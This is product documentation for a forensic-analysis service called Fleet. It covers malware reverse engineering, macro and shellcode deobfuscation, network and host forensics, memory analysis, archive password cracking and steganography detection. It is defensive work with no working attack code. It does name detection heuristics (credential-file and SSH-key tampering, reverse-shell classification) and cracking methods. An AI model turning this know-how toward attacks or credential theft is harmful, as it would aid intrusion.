Forensic Analysis
Overview
Section titled “Overview”Fleet provides deep forensic analysis capabilities across multiple evidence types. Upload a file, describe what you need, and Fleet performs the analysis using industry-standard DFIR tools in its secure, isolated environment. All analysis outputs are saved to your workspace for download and further use.
Malware Reverse Engineering
Section titled “Malware Reverse Engineering”Fleet performs comprehensive static analysis on executable files to identify capabilities, extract indicators, and assess threat levels.
Supported Formats
Section titled “Supported Formats”| Format | Description |
|---|---|
| PE (.exe, .dll, .sys) | Windows Portable Executable files |
| ELF | Linux executable files |
| .NET assemblies | Managed code executables and libraries |
| Shellcode | Raw machine code payloads |
| Packed binaries | UPX, Themida, ASPack, and other packers |
Analysis Capabilities
Section titled “Analysis Capabilities”PE and ELF Analysis:
- File header inspection (compilation timestamp, entry point, subsystem, linker version)
- Section analysis with entropy measurement to detect encryption, compression, or packing
- Import and export table analysis with flagging of suspicious API calls (process injection, credential access, networking, anti-analysis)
- String extraction and classification: URLs, IP addresses, registry keys, file paths, encoded data, mutex names
- Resource and overlay data inspection
- Packer detection and identification
- Disassembly of functions and code flow analysis
Example prompt:
Perform static analysis on the attached PE binary. Deliver: capability summary, IOC table with hashes and network indicators, risk level with reasoning, and MITRE ATT&CK mapping..NET Assembly Analysis:
- CLR metadata extraction (framework version, entry point, assembly references)
- Full decompilation to C# source code for understanding what the code actually does
- Deobfuscation of protected assemblies (SmartAssembly and similar protectors)
- String decryption routine identification and automated decryption
- Obfuscation technique identification (name mangling, control flow obfuscation, resource encryption)
Example prompt:
Deobfuscate the attached .NET assembly and show me the decompiled C# source code. Identify what the malware does and extract all IOCs.Shellcode Analysis:
- Encoding/encryption scheme identification (XOR, rolling XOR, Base64, custom ciphers)
- Automated key brute-forcing and decoding
- Disassembly with function call identification
- API resolution analysis (hash-based dynamic API loading)
- Purpose classification: downloader, reverse shell, stager, or full payload
- IOC extraction from decoded shellcode
Example prompt:
Decode the attached shellcode, identify the encryption scheme, and classify its purpose.Packed Malware:
- Packer identification (UPX, Themida, ASPack, custom packers)
- Entropy-based packing detection
- Side-by-side comparison of packed vs. unpacked variants
- Capability delta analysis showing what packing conceals
Example prompt:
Compare the packed and unpacked variants in the attached archive. Show me what the packing hides.Output
Section titled “Output”Malware analysis produces structured reports including:
- File metadata and hashes (MD5, SHA1, SHA256)
- Capability assessment with confidence levels
- IOC table (network indicators, file indicators, behavioral indicators)
- MITRE ATT&CK technique mapping
- Risk level with supporting evidence
- Recommended response actions
Document Analysis
Section titled “Document Analysis”Fleet investigates documents for embedded threats, malicious macros, and hidden payloads.
Supported Formats
Section titled “Supported Formats”| Format | Description |
|---|---|
| Word (.doc, .docx, .docm) | Microsoft Word documents, including macro-enabled |
| Excel (.xls, .xlsx, .xlsm) | Microsoft Excel spreadsheets, including macro-enabled |
| PowerPoint (.ppt, .pptx) | Microsoft PowerPoint presentations |
| Portable Document Format | |
| RTF | Rich Text Format |
| OLE | Object Linking and Embedding compound files |
| CAB | Cabinet archive files |
Analysis Capabilities
Section titled “Analysis Capabilities”VBA Macro Analysis:
- Macro extraction from Office documents
- Deobfuscation of encoded macros (Base64, character code chains, string concatenation, string reversal, environment variable abuse)
- Auto-execution trigger identification (AutoOpen, Document_Open, Document_Close, Workbook_Open)
- Full execution chain tracing: what the macro does step by step
- Payload download and execution identification
Embedded Object Detection:
- OLE object inspection
- ActiveX control detection
- DDE (Dynamic Data Exchange) field analysis
- External template injection detection (T1221) with URL extraction from OOXML relationships
PDF Analysis:
- JavaScript extraction and deobfuscation
- Embedded file detection
- URL and action extraction
- Metadata analysis (author, creation date, modification date, producer)
- Suspicious structure identification
Metadata Extraction:
- Author, creation and modification timestamps
- Template information
- Last saved by
- Revision count and editing time
Example prompts:
Analyze the attached Word document for malicious macros. Deobfuscate any encoded content and trace the full execution chain.Check this PDF for embedded JavaScript, hidden URLs, and suspicious actions.This Word document appears clean but might use template injection. Analyze the OOXML relationships for external template references.Output
Section titled “Output”Document analysis produces:
- Deobfuscated macro code (if present)
- Full execution chain description
- Extracted IOCs (URLs, IPs, domains, file hashes)
- Social engineering tactic assessment
- MITRE ATT&CK mapping
- Verdict (malicious, suspicious, or benign) with confidence level
Network Forensics
Section titled “Network Forensics”Fleet analyzes network captures to identify malicious activity, command-and-control communication, and data exfiltration.
Supported Formats
Section titled “Supported Formats”| Format | Description |
|---|---|
| PCAP | Packet capture files |
| PCAPNG | Next-generation packet capture files |
Analysis Capabilities
Section titled “Analysis Capabilities”Protocol Analysis:
- Protocol breakdown with distribution statistics
- Per-protocol deep inspection (DNS, HTTP, HTTPS/TLS, SMTP, FTP, SMB)
- Connection summary with top talkers (source and destination IPs)
- Port usage analysis
DNS Analysis:
- Complete DNS query extraction
- Suspicious domain identification
- DNS tunneling detection (high-entropy subdomain queries, unusual query volumes)
- Domain reputation assessment
HTTP/HTTPS Analysis:
- URL extraction and classification
- User agent analysis
- POST data inspection
- File download detection and extraction
- TLS certificate inspection (issuer, subject, validity, self-signed detection)
C2 Detection:
- Beacon pattern identification (regular intervals, jitter analysis)
- Connections to unusual ports
- High-entropy data transfers indicating encrypted C2 channels
- Known C2 framework signature detection
Exfiltration Detection:
- Unusual outbound data volumes
- Data staging patterns
- DNS exfiltration (encoded data in DNS queries)
- Encrypted channel analysis
Example prompts:
Analyze the attached PCAP for C2 communication and data exfiltration indicators.Extract all DNS queries from this PCAP and flag any suspicious domains.Identify beacon patterns in this network capture and determine the C2 interval.Output
Section titled “Output”Network forensics produces:
- Protocol statistics and connection summary
- Extracted IOCs (IPs, domains, URLs, user agents)
- Suspicious findings with evidence
- Exported HTTP objects (downloaded files)
- Threat assessment with confidence levels
Host Forensics
Section titled “Host Forensics”Fleet performs system-level forensic analysis within its secure environment.
Capabilities
Section titled “Capabilities”Filesystem Timeline:
- Reconstruct file modification history over configurable time windows
- Focus on IR-relevant directories: system configuration, temporary directories, log files, scheduled tasks, binary directories, user home directories
- File classification by type and risk level
- Suspicious pattern flagging:
- New executables in temporary directories
- Modified authentication configurations (passwd, shadow, sudoers)
- Altered or cleared log files
- Hidden files and directories
- SUID/SGID permission changes
- Recently added cron entries or SSH authorized keys
Rootkit Detection:
- System-level rootkit scanning
- Hidden process detection
- Kernel module inspection
- File integrity verification
System Auditing:
- Configuration review
- Service and process enumeration
- Network connection analysis
- User account and privilege review
Example prompt:
Create a forensic timeline of files modified in the last 48 hours, focusing on /etc, /tmp, /var/log, and home directories. Flag anything suspicious.Disk and Memory Forensics
Section titled “Disk and Memory Forensics”Fleet can analyze disk images and memory dumps uploaded to the workspace.
Disk Image Analysis
Section titled “Disk Image Analysis”Supported formats: RAW, E01, VMDK, VHD/VHDX.
Capabilities:
- Partition layout analysis
- File system browsing and file recovery
- Deleted file recovery
- File carving from unallocated space
- Timeline generation from filesystem metadata
Memory Dump Analysis
Section titled “Memory Dump Analysis”Capabilities:
- Process listing and analysis
- Network connection enumeration
- Malware detection in memory (code injection, hollowed processes, suspicious memory regions)
- DLL and module listing
- Registry hive extraction from memory
Example prompt:
Analyze this memory dump. List all running processes, identify any injected code, and extract network connections.Cryptographic and Steganographic Analysis
Section titled “Cryptographic and Steganographic Analysis”Password Cracking
Section titled “Password Cracking”Fleet can attempt to crack password-protected archives using common malware analysis passwords (infected, malware, virus) and custom wordlists or patterns.
Example prompt:
The attached ZIP is password-protected using the format "infected_YYYYMMDD". Crack it and extract the contents.Steganography Detection
Section titled “Steganography Detection”Fleet analyzes images for hidden data using multiple detection methods:
- LSB (Least Significant Bit) analysis
- EOF (End of File) marker inspection for appended data
- Known steganography tool signature detection (Steghide, OpenStego, and others)
- Entropy analysis across image regions to identify areas with unusual randomness
- Attempted extraction of detected hidden content
Example prompt:
Analyze the attached image for steganographic content. Try all detection methods and report confidence levels.Limitations
Section titled “Limitations”- All forensic analysis runs within Fleet’s isolated environment. Fleet cannot directly scan live systems or endpoints.
- Memory forensics requires a compatible memory dump format. Raw memory dumps produce the best results.
- Password cracking is limited to dictionary-based and pattern-based approaches. Complex passwords may not be recoverable.
- Steganography detection is probabilistic. Not all steganographic methods can be detected, and false positives are possible.